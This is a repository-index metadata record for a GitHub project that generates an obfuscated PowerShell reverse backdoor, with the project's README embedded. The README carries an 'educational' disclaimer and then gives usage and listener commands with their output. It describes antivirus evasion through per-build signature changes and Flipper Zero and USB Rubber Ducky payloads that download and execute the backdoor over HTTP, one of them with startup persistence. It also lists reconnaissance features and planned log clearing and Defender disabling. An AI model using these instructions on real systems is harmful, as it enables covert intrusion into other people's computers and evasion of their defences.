{"id":21361396,"url":"https://github.com/drew-alleman/powershell-backdoor-generator","last_synced_at":"2025-04-06T16:14:27.626Z","repository":{"id":58175160,"uuid":"530411780","full_name":"Drew-Alleman/powershell-backdoor-generator","owner":"Drew-Alleman","description":"Reverse backdoor written in PowerShell and obfuscated with Python. It generates payloads for popular hacking devices like Flipper Zero and Hak5 USB Rubber Ducky, and changes its signature after every build to help avoid AV.","archived":false,"fork":false,"pushed_at":"2023-06-19T21:05:18.000Z","size":320,"stargazers_count":358,"open_issues_count":4,"forks_count":61,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-03-30T15:08:34.164Z","etag":null,"topics":["backdoor","bad-usb","ethical-hacking","flipper-zero","hacking","hak5","hak5-ducky","hak5-rubber-ducky","obfuscation","powershell","powershell-backdoor","powershell-hacking","python","python-hacking","reverse-backdoor","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Drew-Alleman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-08-29T22:17:12.000Z","updated_at":"2025-03-30T14:27:40.000Z","dependencies_parsed_at":"2024-12-23T19:12:49.102Z","dependency_job_id":"a31f999c-af89-4406-b4eb-937be51561fb","html_url":"https://github.com/Drew-Alleman/powershell-backdoor-generator","commit_stats":{"total_commits":139,"total_committers":1,"mean_commits":139.0,"dds":0.0,"last_synced_commit":"90fe7835f15375f29d7ff015b7f60d8a0c7c3511"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Drew-Alleman","download_url":"https://codeload.github.com/Drew-Alleman/powershell-backdoor-generator/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247509237,"owners_count":20950232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","bad-usb","ethical-hacking","flipper-zero","hacking","hak5","hak5-ducky","hak5-rubber-ducky","obfuscation","powershell","powershell-backdoor","powershell-hacking","python","python-hacking","reverse-backdoor","windows"],"created_at":"2024-11-22T06:09:38.329Z","updated_at":"2025-04-06T16:14:27.608Z","avatar_url":"https://github.com/Drew-Alleman.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"```\n/******************************************************************************\n * DISCLAIMER: \n * \n * This program is intended for educational purposes only. By using this program,\n * you agree that you understand the potential risks associated with its use.\n * \n * - This program should not be used on any system or network without proper \n *   authorization. Unauthorized use is strictly prohibited.\n * \n * - The creator of this program assumes no liability for any damages, legal \n *   consequences, or loss of data caused by the use of this program.\n * \n * - It is your responsibility to ensure that you comply with all applicable \n *   laws and regulations while using this program.\n * \n * Please use this program responsibly and ethically, and respect the privacy \n * and security of others.\n *****************************************************************************/\n\n\n```\n\n# powershell-backdoor\n[![Guide](https://img.youtube.com/vi/C6_6-7b6P3E/0.jpg)](https://www.youtube.com/watch?v=C6_6-7b6P3E)\n\u003cbr\u003e\nReverse backdoor tool written in PowerShell and obfuscated with Python, providing a new signature after every build to avoid detection. The tool has the capability to create payloads for popular hacking devices such as Flipper Zero and Hak5 USB Rubber Ducky. Use this tool to test your system's defenses against advanced attack techniques.\n```\nusage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]\n                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]\n\nPowershell Backdoor Generator\n\noptions:\n  -h, --help            show this help message and exit\n  --ip-address IP_ADDRESS, -i IP_ADDRESS\n                        IP Address to bind the backdoor too (default: 192.168.X.XX)\n  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)\n  --random, -r          Randomizes the outputed backdoor's file name\n  --out OUT, -o OUT     Specify the backdoor filename (relative file names)\n  --verbose, -v         Show verbose output\n  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)\n  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)\n  --ducky               Creates an inject.bin for the http server\n  --server-port SERVER_PORT\n                        Port to run the HTTP server on (--server) (default: 8080)\n  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute\n  --list--payloads      List all available payloads\n  -k KEYBOARD, --keyboard KEYBOARD\n                        Keyboard layout for Bad Usb/Flipper Zero (default: us)\n  -A, --actually-listen\n                        Just listen for any backdoor connections\n  -H, --listen-and-host\n                        Just listen for any backdoor connections and host the backdoor directory\n```\n# Quick Links\n* [Preview](#preview)\n* [Features](#features)\n* [Standard Backdoor](#standard-backdoor)\n* [Flipper Zero Backdoor](#flipper-zero-backdoor)\n* [USB Rubber Ducky Backdoor](#usb-rubber-ducky-backdoor)\n* [Thanks](#thanks)\n* [To Do](#to-do)\n* [Output of 5 Obfuscations](#output-of-5-obfuscations)\n\n## Preview\n![preview](/core/images/preview.PNG)\n\u003cbr\u003e\n\n## Features\n* Hak5 Rubber Ducky payload\n* Flipper Zero payload\n* Download Files from remote system\n* Play wav files from a URL\n* Fetch target computers public IP address\n* List local users\n* Find Intresting Files\n* Gather information about the target system's operating system\n* Retrieve BIOS information from the target syste\n* Check if an anti-virus software is installed and its current status\n* Get Active TCP Clients\n* Install Chocolatey, a popular package manager for Windows (https://chocolatey.org/)\n* Check if common pentesting software is installed on the target system.\n\n## Standard backdoor\n``` bash\nC:\\Users\\DrewQ\\Desktop\\powershell-backdoor-main\u003e python .\\listen.py --verbose\n[*] Encoding backdoor script\n[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71\n[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop\n```\nA file in the current working directory will be created called backdoor.ps1\n\n### Backdoor Execution\nTested on Windows 11, Windows 10 and Kali Linux. To run this as a hidden window and with persistence access follow the guide ![here](https://github.com/Drew-Alleman/powershell-backdoor-generator/issues/2#issuecomment-1546996105)\n```cmd\npowershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted\n```\n```cmd\n┌──(drew㉿kali)-[/home/drew/Documents]\n└─PS\u003e ./backdoor.ps1\n```\n\n# Bad USB/ USB Rubber Ducky attacks\nWhen using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.\n\n## Payloads\n   * Execute -- Execute the backdoor \n   * BindAndExecute -- Place the backdoor in the users temp directory, bind the backdoor to startup and then execute it. (Requires Admin)\n## Flipper Zero Backdoor\nBelow will generate a file called powershell_backdoor.txt, which when triggered on the Flipper will fetch the backdoor from your computer over HTTP and execute it.\n```\nC:\\Users\\DrewQ\\Desktop\\powershell-backdoor-main\u003e python .\\listen.py --flipper powershell_backdoor --payload execute\n[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1\n[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop\n```\nPlace the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed \nit will download and execute backdoor.ps1\n\n## Usb Rubber Ducky Backdoor\nBelow is a tutorial on how to generate an inject.bin file for the Hak5 USB Rubber ducky\n```\n C:\\Users\\DrewQ\\Desktop\\powershell-backdoor-main\u003e python .\\listen.py --ducky --payload BindAndExecute\n[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1\n[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop\n```\nA file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed \nit will download and execute backdoor.ps1\n\n## Thanks\nTo encode payload.txt into inject.bin for USB Rubber Ducky Attacks I use encoder.jar created by ![midnitesnake](https://github.com/midnitesnake).\n\n## To Do \n* Pull Recent RDP connections\n* Change Wallpaper from URL\n* Find Writeable Directories\n* Clear Logs\n* Disable Defender\n\n## Output of 5 Obfuscations\nBelow is the sha1 hash of backdoor.ps1 after 5 builds.\n```\n1e158f02484e5c58d74c1507a1773392ffacfca2\n6d18230a419195d0f77519abc0238768956cdd58\n558a8cbac40239c9e6660a45cc8fc5d02b5057d7\ncaf4d0c8424eceb960d5f5c526e83ecd485c4ac9\n947b57824917842d79f9cbcac8a795aa7c2f8a49\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdrew-alleman%2Fpowershell-backdoor-generator","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdrew-alleman%2Fpowershell-backdoor-generator","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdrew-alleman%2Fpowershell-backdoor-generator/lists"}